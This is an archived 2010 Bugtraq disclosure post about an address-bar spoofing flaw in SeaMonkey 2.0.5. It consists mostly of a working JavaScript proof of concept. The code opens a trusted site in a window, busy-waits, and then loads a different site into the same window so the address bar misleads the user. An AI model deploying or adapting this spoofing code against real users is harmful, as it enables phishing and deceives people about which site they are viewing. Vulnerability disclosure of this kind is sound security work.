lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20100717124357.14194.qmail@securityfocus.com>
Date: 17 Jul 2010 12:43:57 -0000
From: info@...uritylab.ir
To: bugtraq@...urityfocus.com
Subject: SeaMonkey 2.0.5 Address Bar Spoofing Vulnerability

Spoof Code:

<script language="javascript">
function pause(pd)
{
date = new Date();
var curDate = null;
do { var curDate = new Date(); }
while(curDate-date < pd);
}
function Spoofing () {
win = window.open('http://www.google.com','new')
pause (13000)
win = window.open('http://www.Securitylab.ir','new')
}
</script>
<a href="javascript: Spoofing()">Click Here</a>
##########################################################################

Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)
Original Advisory: http://pouya.info/blog/userfiles/pdf/SeaMonkey-ABS.pdf
http://Securitylab.ir/Advisory

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ